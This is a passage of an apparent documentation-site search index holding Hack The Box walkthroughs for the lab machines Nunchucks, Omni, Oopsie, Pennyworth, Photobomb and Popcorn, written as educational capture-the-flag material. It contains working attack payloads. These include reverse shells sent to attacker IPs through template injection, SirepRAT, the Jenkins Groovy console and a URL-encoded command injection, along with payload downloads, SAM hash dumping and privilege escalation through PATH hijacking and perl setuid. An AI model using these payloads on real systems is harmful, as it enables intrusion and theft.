                        {{range}}\n\n{{range.constructor(\\\"return global.process.mainModule.require('child_process').execSync('id')\\\")()}}\n\n{{range.constructor(\\\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\\\")()}}\n\n{{range.constructor(\\\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f')\\\")()}}\n

                        The last one is a reverse shell. Before running it in BurpSuite Repeater, I've setup my listener with netcat on port 1234.

                        ","tags":["walkthrough"]},{"location":"htb-nunchucks/#roots-flag","title":"Root's flag","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#privileges-escalation","title":"Privileges escalation","text":"

                        We'll abuse some process capability vulnerability to escalate to root. First we list processes capabilities:

                        getcap -r 2>/dev/null\n

                        Result:

                        /usr/bin/perl = cap_setuid+ep\n/usr/bin/mtr-packet = cap_net_raw+ep\n/usr/bin/ping = cap_net_raw+ep\n/usr/bin/traceroute6.iputils = cap_net_raw+ep\n/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep\n

                        We will use perl binary to escalate.

                        echo -ne '#!/bin/perl \\nuse POSIX qw(setuid); \\nPOSIX::setuid(0); \\nexec \"/bin/bash\";' > pay.pl\nchmod +x pay.pl\n./pay.pl\n

                        And you are root.

                        ","tags":["walkthrough"]},{"location":"htb-omni/","title":"Walkthrough - Omni, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-omni/#about-the-machine","title":"About the machine","text":"data Machine Omni Platform Hackthebox url link OS Windows Difficulty Easy Points 20 ip 10.129.2.27","tags":["walkthrough"]},{"location":"htb-omni/#getting-usertxt-flag","title":"Getting user.txt flag","text":"","tags":["walkthrough"]},{"location":"htb-omni/#enumeration","title":"Enumeration","text":"
                        sudo nmap -sV -sC $ip -p-\n

                        Results:

                        PORT      STATE SERVICE  VERSION\n135/tcp   open  msrpc    Microsoft Windows RPC\n5985/tcp  open  upnp     Microsoft IIS httpd\n8080/tcp  open  upnp     Microsoft IIS httpd\n| http-auth: \n| HTTP/1.1 401 Unauthorized\\x0D\n|_  Basic realm=Windows Device Portal\n|_http-title: Site doesn't have a title.\n|_http-server-header: Microsoft-HTTPAPI/2.0\n29817/tcp open  unknown\n29819/tcp open  arcserve ARCserve Discovery\n29820/tcp open  unknown\n
                        ","tags":["walkthrough"]},{"location":"htb-omni/#exploiting-tcp-2981729820","title":"Exploiting TCP 29817/29820","text":"

                        SirepRAT. Investigate

                        # testing for an existing file\npython ~/tools/SirepRAT/SirepRAT.py $ip GetFileFromDevice --remote_path \"C:\\Windows\\System32\\drivers/etc/hosts\" --v\n\n# Place a nc64.exe file in the apache root server\nsudo cp ~/tools/nc64.exe /var/www/html\n\n# Start Apache server\nsudo service apache2 start\n\n# Upload nc64.exe: With SireRAT use cmd.exe in the victim's machine to lauch a powershell \npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c powershell Invoke-WebRequest -outfile c:\\windows\\system32\\nc64.exe -uri http://10.10.14.2/nc64.exe'\n\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c powershell Invoke-WebRequest -outfile c:\\windows\\system32\\nc64.exe -uri http://10.10.14.2/nc64.exe'\n\n\n# Open a listener in our attacker machine\nrlwrap nc -lnvp 443\n\n# Launch netcat in victim's machine via SirepRAT\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443'\n

                        After browsing around we can see these interesting files:

                        • C:\\Data\\Users\\administrator\\root.txt
                        • C:\\Data\\Users\\app\\user.txt
                        • C:\\Data\\Users\\app\\iot-admin.xml
                          • C:\\Data\\Users\\app\\hardening.txt

                        user.txt and root.txt \u00a0are PSCredential files with this format. To decrypt their passwords, we will need the user\u2019s password and the administrator's password. There are several approaches to obtain them:

                        ","tags":["walkthrough"]},{"location":"htb-omni/#path-1-creds-in-a-file","title":"Path 1: creds in a file","text":"

                        Evaluate all files until you get to C:\\Program Files\\WindowsPowershell\\Modules\\PackageManagement. Use powershell so you can run:

                        ls -force\ntype r.bat\n

                        Result:

                        @echo off\n\n:LOOP\n\nfor /F \"skip=6\" %%i in ('net localgroup \"administrators\"') do net localgroup \"administrators\" %%i /delete\n\nnet user app mesh5143\nnet user administrator _1nt3rn37ofTh1nGz\n\nping -n 3 127.0.0.1\n\ncls\n\nGOTO :LOOP\n\n:EXIT\n
                        ","tags":["walkthrough"]},{"location":"htb-omni/#path-2-dump-samsystemsecurity-hives-extract-hashes-and-crack-them","title":"Path 2: Dump sam/system/security hives, extract hashes and crack them","text":"

                        We will dump the SAM database to the attacker's machine. For that, first we will create a share in the attacker's machine:

                        # First crate the share CompData in our attacker's machine\nsudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/ -username \"username\" -password \"agreatpassword\"\n
                        #  After that, establish the connection with nc\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c net use \\\\10.10.14.2\\CompData /u:username agreatpassword'\n

                        After that we can dump the hives: sam, system, and security:

                        # Now we will dump the hives we need. First, the SAM database\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c reg save HKLM\\sam \\\\10.10.14.2\\CompData\\sam'\n\n# Secondly, system\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c reg save HKLM\\system \\\\10.10.14.2\\CompData\\system'\n\n# Thirdly, security\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c reg save HKLM\\security \\\\10.10.14.2\\CompData\\security'\n

                        From the attacker's machine now, we can use secretdump.py to extract the hashes:

                        secretsdump.py -sam sam -security security -system system LOCAL\n

                        From that we will obtain the following NTLM hashes:

                        Impacket v0.10.1.dev1+20230511.163246.f3d0b9e - Copyright 2022 Fortra\n\n[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5\n[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nWDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::\nsshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::\nDevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::\napp:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::\n

                        We can crack them with hashcat:

                        hashcat -m 1000 -O -a3 -i hashes.txt\n
                        ","tags":["walkthrough"]},{"location":"htb-omni/#exploiting-tcp-8080","title":"Exploiting TCP 8080","text":"

                        Credentials obtained for user \"app\" and \"administrator\" are valid to login into the portal that we observed previously in port 8080.

                        Login as app, and go to the option \"Run Command\"

                        From the attacker's machine, get a terminal listening:

                        rlwrap nc -lnvp 443\n

                        In the Run command screen, run:

                        c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443\n

                        The listener will display the connection. Now:

                        # Launch powershell\npowershell\n\n# Go to \ncd C:\\Data\\Users\\app\n\n# Decrypt the PSCredential file\n(Import-CliXml -Path user.txt).GetNetworkCredential().Password\n

                        As a result your will obtain the user.txt's flag.

                        ","tags":["walkthrough"]},{"location":"htb-omni/#get-roottxt","title":"Get root.txt","text":"

                        Logout from the portal as user \"app\" and login again as administrator.

                        From the attacker's machine, get a terminal listening:

                        rlwrap nc -lnvp 443\n

                        In the Run command screen, run:

                        c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443\n

                        The listener will display the connection. Now:

                        # Launch powershell\npowershell\n\n# Go to \ncd C:\\Data\\Users\\administrator\n\n# Decrypt the PSCredential file\n(Import-CliXml -Path root.txt).GetNetworkCredential().Password\n

                        As a result your will obtain the root.txt's flag.

                        ","tags":["walkthrough"]},{"location":"htb-oopsie/","title":"Oopsie - A Hack The Box machine","text":"
                        nmap -sC -sV $ip -Pn\n
                        Host is up (0.034s latency).\nNot shown: 998 closed tcp ports (conn-refused)\nPORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 61e43fd41ee2b2f10d3ced36283667c7 (RSA)\n|   256 241da417d4e32a9c905c30588f60778d (ECDSA)\n|_  256 78030eb4a1afe5c2f98d29053e29c9f2 (ED25519)\n80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: Welcome\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

                        Open browser. From scripts called in home page you extract this path:

                        <script src=\"/cdn-cgi/login/script.js\"></script>\n

                        Then you are in a login page that provides a way to login as a guest.

                        When logged in, and being a guest pay attention to cookies:

                        Now, in browser change id 2 to id 1 to see if data from other user is exposed.

                        It is. Change the value of the cookies in the browser to be admin.

                        Upload a php reverse shell. I usually use the pentesmonkey one.

                        Now I use gobuster to enum possible locations for the upload:

                        gobuster dir -u http://10.129.95.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -t 20\n
                        ===============================================================\nGobuster v3.5\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http://10.129.95.191\n[+] Method:                  GET\n[+] Threads:                 20\n[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster/3.5\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n/images               (Status: 301) [Size: 315] [--> http://10.129.95.191/images/]\n/themes               (Status: 301) [Size: 315] [--> http://10.129.95.191/themes/]\n/uploads              (Status: 301) [Size: 316] [--> http://10.129.95.191/uploads/]\n/css                  (Status: 301) [Size: 312] [--> http://10.129.95.191/css/]\n/js                   (Status: 301) [Size: 311] [--> http://10.129.95.191/js/]\n/fonts                (Status: 301) [Size: 314] [--> http://10.129.95.191/fonts/]\nProgress: 87567 / 87665 (99.89%)\n===============================================================\n==============================================================\n

                        Nice, but being user admin I can not get into http://10.129.95.191/uploads/.

                        Is there any other user with more permissions? I will use BurpSuite Intruder to enumerate possible users based on object serialization (id). This would be the endpoint: http://10.129.95.191/cdn-cgi/login/admin.php?content=accounts&id=30

                        User id 30 is super admin. With this I update my cookies and now I'm able to access http://10.129.95.191/uploads/pentesmonkey.php. Before that:

                        nc -lnvp 1234\n
                        ","tags":["walkthrough"]},{"location":"htb-pennyworth/","title":"Pennyworth - A HackTheBox machine","text":"
                        nmap -sC -sV $ip -Pn -p-\n

                        Port 8080 is open and from browser we can see a login page of a jenkin service. Version is not displayed.

                        Running this request through Burpsuite intruder

                        POST /j_spring_security_check HTTP/1.1\nHost: 10.129.228.92:8080\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\nOrigin: http://10.129.228.92:8080\nConnection: close\nReferer: http://10.129.228.92:8080/login?from=%2F\nCookie: JSESSIONID.4f24ed31=node0de80ew54idnc17ajfpe13p5hc0.node0\nUpgrade-Insecure-Requests: 1\n\nj_username=admin&j_password=!@#$%^&from=%2F&Submit=Sign+in\n

                        Payload will be in password parameter. You can use several dictionaries. In the sampled request the response will be a 500 response code with Jenkin version visible at the footer:

                        <div class=\"page-footer__links page-footer__links--white jenkins_ver\"><a rel=\"noopener noreferrer\" href=\"https://jenkins.io/\" target=\"_blank\">Jenkins 2.289.1</a></div>\n

                        Default password for the service (admin:password) doesn't work. By performing some brute force attack with basic dictionaries, password is root:password

                        Nice repository for pentesting jenkins. I guess there might be several approaches and solutions to this machine. In my case, I used the Script console provided in jenkins with the following payload:

                        String host=\"myip\";\nint port=1234;\nString cmd=\"/bin/bash\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();\n

                        After that:

                        whoami\ncat /root/flag.txt\n
                        ","tags":["walkthrough"]},{"location":"htb-photobomb/","title":"Walkthrough - Photobomb, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-photobomb/#about-the-machine","title":"About the machine","text":"data Machine Photobomb Platform Hackthebox url link creator slartibartfast OS Linux Release data 08 October 2022 Difficulty Easy Points 20 ip 10.10.11.182","tags":["walkthrough"]},{"location":"htb-photobomb/#recon","title":"Recon","text":"

                        For the sake of commodity, we'll create a variable:

                        export ip=10.10.11.182\n
                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#service-port-enumeration","title":"Service/ Port enumeration","text":"

                        Run nmap to enumerate open ports, services, OS, and traceroute

                        General enumeration not to make too much noise:

                        sudo nmap $ip -Pn\n
                        Results:
                        Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-20 12:34 EDT\nNmap scan report for 10.10.11.182\nHost is up (0.095s latency).\nNot shown: 998 closed tcp ports (reset)\nPORT   STATE SERVICE\n22/tcp open  ssh\n80/tcp open  http\n
                        Once you know open ports, run nmap to see service versions and more details:
                        sudo nmap -sCV -p22,80 $ip\n
                        Results:
                        PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)\n|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)\n|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)\n80/tcp open  http    nginx 1.18.0 (Ubuntu)\n|_http-title: Did not follow redirect to http://photobomb.htb/\n|_http-server-header: nginx/1.18.0 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
                        We open 10.10.11.182 in the browser. A redirection to http://photobomp.htb occurs, but the server is not found. So we add this routing in our /etc/hosts file:

                        We open the /etc/hosts file with an editor. For instance, nano.

                        sudo nano /etc/hosts\n
                        We move the cursor to the end and we add these lines:
                        10.10.11.182    photobomb.htb\n

                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#directory-enumeration","title":"Directory enumeration","text":"

                        We can use dirbuster to enumerate directories:

                        dirbuster\n
                        And we configure it to launch this dictionary: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

                        Results:

                        Dirs found with a 200 response:\n\n/\n\nDirs found with a 401 response:\n\n/printer/\n/printers/\n/printerfriendly/\n/printer_friendly/\n/printer_icon/\n/printer-icon/\n/printer-friendly/\n/printerFriendly/\n/printersupplies/\n/printer1/\n\n\n--------------------------------\nFiles found during testing:\n\nFiles found with a 401 response:\n\n/printer\n/printer.php\n/printers.php\n/printerfriendly.php\n/printer_friendly.php\n/printer_icon.php\n/printer-friendly.php\n/printerFriendly.php\n/printersupplies.php\n/printer1.php\n\nFiles found with a 200 response:\n\n/photobomb.js\n

                        As we wait, we do a dns enumeration:

                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#dns-enumeration","title":"DNS enumeration","text":"

                        Running:

                        nslookup\n
                        And after that:
                        > SERVER 10.10.11.182\n
                        Results:
                        Default server: 10.10.11.182\nAddress: 10.10.11.182#53\n
                        Then, we run:
                        > 10.10.11.182\n
                        And as a result, we have:
                        ** server can't find 182.11.10.10.in-addr.arpa: NXDOMAIN\n
                        So there is no result.

                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#exploiting-the-login-page","title":"Exploiting the login page","text":"

                        At http://photobomb.htb/printer we find a login page. Use Burp to capture the request of a failed login using \"username\" as username and \"password\" as a password.

                        GET /printer HTTP/1.1\nHost: photobomb.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: http://photobomb.htb/\nUpgrade-Insecure-Requests: 1\nAuthorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=\n
                        The authorization is the text \"username:password\" encoded in base64, which is known as Basic HTTP Authentication Scheme.

                        After trying to brute force the login page with different seclist dictionaries, we decided to have a look at the only file with response 200 in the directory enumeration: http://photobomb.htb/photobomb.js, and bingo! The user and password are there:

                        function init() {\n  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me\n  if (document.cookie.match(/^(.*;)?\\s*isPhotoBombTechSupport\\s*=\\s*[^;]+(.*)?$/)) {\n    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');\n  }\n}\nwindow.onload = init;\n
                        We login into the web with: + user: pH0t0 + password: b0Mb!

                        After entering user+pass a pannel to download images is displayed. Capturing with BurpSuite this HTTP request to download an image we have:

                        POST /printer HTTP/1.1\nHost: photobomb.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nOrigin: http://photobomb.htb\nAuthorization: Basic cEgwdDA6YjBNYiE=\nConnection: close\nReferer: http://photobomb.htb/printer\nUpgrade-Insecure-Requests: 1\n\nphoto=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000\n

                        Playing a little with this request in BurpSuite (module Repeater) we can infer that the site is using ruby as a programming language. Now we can play a little with the three parameters we have in the request (photo, filetype, and dimensions) and discover that for some reason filetype is injectable. We can add either a reverse shell in ruby or a reverse shell with netcat. Python doesn't work for us here. I go for an nc reverse shell and url-encode it like this:

                        POST /printer HTTP/1.1\nHost: photobomb.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 164\nOrigin: http://photobomb.htb\nAuthorization: Basic cEgwdDA6YjBNYiE=\nConnection: close\nReferer: http://photobomb.htb/printer\nUpgrade-Insecure-Requests: 1\n\nphoto=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=png;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.80+24444+>/tmp/f&dimensions=3000x2000\n

                        Now, in the attacker machine (mine is 10.10.14.80), we listen on port 24444:

                        nc -lnvp 24444\n
                        Once we have the attacker machine listening, we go back to the repeater module in Burp Suite and launch the attack with the SEND button. We will obtain a reverse shell in the attacker machine.

                        After that, we run:

                        whoami\ncat /home/wizard/user.txt\n
                        to get the user flag: *****

                        ","tags":["walkthrough"]},{"location":"htb-photobomb/#getting-the-system-flag","title":"Getting the system flag","text":"

                        We run some basic commands:

                        id\n
                        Results:
                        uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)\n
                        echo $SHELL\n
                        Results:
                        /bin/bash\n
                        uname -a\n
                        Results:
                        Linux photobomb 5.4.0-126-generic #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux\n
                        sudo -l\n

                        Results:

                        Matching Defaults entries for wizard on photobomb:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser wizard may run the following commands on photobomb:\n    (root) SETENV: NOPASSWD: /opt/cleanup.sh\n

                        Two interesting things here: 1. Our user can modify environmental variables, and 2. Our user can execute /opt/cleanup.sh as root with no need for a password. Having a look at the /opt/cleanup.sh file, we can see the command \"find\" invoked with a relative path:

                        #!/bin/bash\n. /opt/.bashrc\ncd /home/wizard/photobomb\n\n# clean up log files\nif [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]\nthen\n  /bin/cat log/photobomb.log > log/photobomb.log.old\n  /usr/bin/truncate -s0 log/photobomb.log\nfi\n\n# protect the priceless originals\nfind source_images -type f -name '*.jpg' -exec chown root:root {} \\;\n
                        Knowing that we can modify environmental variables, we are going to create a find file with execution permissions in our folder, and then we are going to add our folder in the first position of the $PATH environmental variable. With that we will execute /opt/cleanup.sh and escalate to root.

                        cd ~\necho bash > find\nchmod +x find\nsudo PATH=$PWD:$PATH /opt/cleanup.sh\n
                        Now, we are root:

                        id\n

                        Results:

                        uid=0(root) gid=0(root) groups=0(root)\n

                        And the flag:

                        cat root.txt\n
                        Results: *******

                        ","tags":["walkthrough"]},{"location":"htb-popcorn/","title":"Popcorn - A HackTheBox machine","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#flag-usertxt","title":"Flag user.txt","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#reconnaissance","title":"Reconnaissance","text":"
                        nmap -sC -sV -Pn 10.10.10.6 -p-\n

                        Result:

                        PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 3ec81b15211550ec6e63bcc56b807b38 (DSA)\n|_  2048 aa1f7921b842f48a38bdb805ef1a074d (RSA)\n80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))\n|_http-title: Site doesn't have a title (text/html).\n|_http-server-header: Apache/2.2.12 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#enumeration","title":"Enumeration","text":"
                        dirb http://10.10.10.6 /usr/share/wordlists/dirb/common.txt\n

                        First result:

                        ---- Scanning URL: http://10.10.10.6/ ----\n+ http://10.10.10.6/.bash_history (CODE:200|SIZE:320) \n+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:286)         + http://10.10.10.6/index (CODE:200|SIZE:177)            + http://10.10.10.6/index.html (CODE:200|SIZE:177)       + http://10.10.10.6/server-status (CODE:403|SIZE:291)    + http://10.10.10.6/test (CODE:200|SIZE:47330)           ==> DIRECTORY: http://10.10.10.6/torrent/                \n

                        Browsing to http://10.10.10.6/.bash_history you can get how to escalate privileges later on:

                        Looks like someone exploited a dirty cow vulnerability here. La la la la.

                        But let's browse the directory http://10.10.10.6/torrent/

                        Browsing around we can identify a login page at http://popcorn.htb/torrent/login.php. This login page is vulnerable to SQLi.

                        We can use sqlmap to dump users' database:

                        sqlmap --url http://popcorn.htb/torrent/login.php --data=\"username=lele&password=lalala\" -D torrenthoster -T users --dump --batch\n

                        Here, someone created a user before me:

                        But since registering is open, we will create our own user to login into the application.

                        Once you are logged in, browse around. There exist a panel to upload your torrents.

                        Play with it. No reverse shell is allowed. But there is also another panel to edit an existing upload:

                        The screenshot file is not properly sanitized. Try to upload a pentesmonkey, but capturing it with Burpsuite. Modify the content-type header to \"image/png\" and...

                        Reverse shell is uploaded. Get your netcat listening on port 1234 (or other):

                        nc -lnvp 1234\n

                        Click on button \"Image File not Found\" and... bingo! You have a shell on your listener.

                        Spawn your shell.

                        python -c 'import pty; pty.spawn(\"/bin/bash\")'\n

                        Get user's flag in /home/george/user.txt

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#flag-roottxt","title":"Flag root.txt","text":"

                        From previous user of the machine we know that this machine has probably a dirtycow vulnerability. But we can server from our machine the script LinPEAS.

                        Now in the victim's machine:

                        wget http://<attacker IP>/linpeas.sh\nchmod +x linpeas.sh\n./linpeash.sh\n

                        Results:

                        \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Executing Linux Exploit Suggester\n\u255a https://github.com/mzet-/linux-exploit-suggester                                                                         \n[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson                                                                \n\n   Details: http://vulnfactory.org/exploits/full-nelson.c\n   Exposure: highly probable\n   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}\n   Download URL: http://vulnfactory.org/exploits/full-nelson.c\n\n[+] [CVE-2016-5195] dirtycow\n\n   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\n   Exposure: probable\n   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04\n   Download URL: https://www.exploit-db.com/download/40611\n   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2016-5195] dirtycow 2\n\n   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\n   Exposure: probable\n   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}\n   Download URL: https://www.exploit-db.com/download/40839\n   ext-url: https://www.exploit-db.com/download/40847\n   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2010-3904] rds\n\n   Details: http://www.securityfocus.com/archive/1/514379\n   Exposure: probable\n   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},[ ubuntu=10.10|9.10 ],fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}\n   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c\n\n[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson\n\n   Details: https://www.exploit-db.com/exploits/17787/\n   Exposure: probable\n   Tags: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-server}\n   Download URL: https://www.exploit-db.com/download/17787\n\n[+] [CVE-2010-1146] reiserfs\n\n   Details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/\n   Exposure: probable\n   Tags: [ ubuntu=9.10 ]\n   Download URL: https://jon.oberheide.org/files/team-edward.py\n\n[+] [CVE-2010-0832] PAM MOTD\n\n   Details: https://www.exploit-db.com/exploits/14339/\n   Exposure: probable\n   Tags: [ ubuntu=9.10|10.04 ]\n   Download URL: https://www.exploit-db.com/download/14339\n   Comments: SSH access to non privileged user is needed\n\n[+] [CVE-2021-3156] sudo Baron Samedit\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: less probable\n   Tags: mint=19,ubuntu=18|20, debian=10\n   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main\n\n[+] [CVE-2021-3156] sudo Baron Samedit 2\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: less probable\n   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10\n   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main\n\n[+] [CVE-2021-22555] Netfilter heap out-of-bounds write\n\n   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html\n   Exposure: less probable\n   Tags: ubuntu=20.04{kernel:5.8.0-*}\n   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c\n   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c\n   Comments: ip_tables kernel module must be loaded\n\n[+] [CVE-2019-18634] sudo pwfeedback\n\n   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/\n   Exposure: less probable\n   Tags: mint=19\n   Download URL: 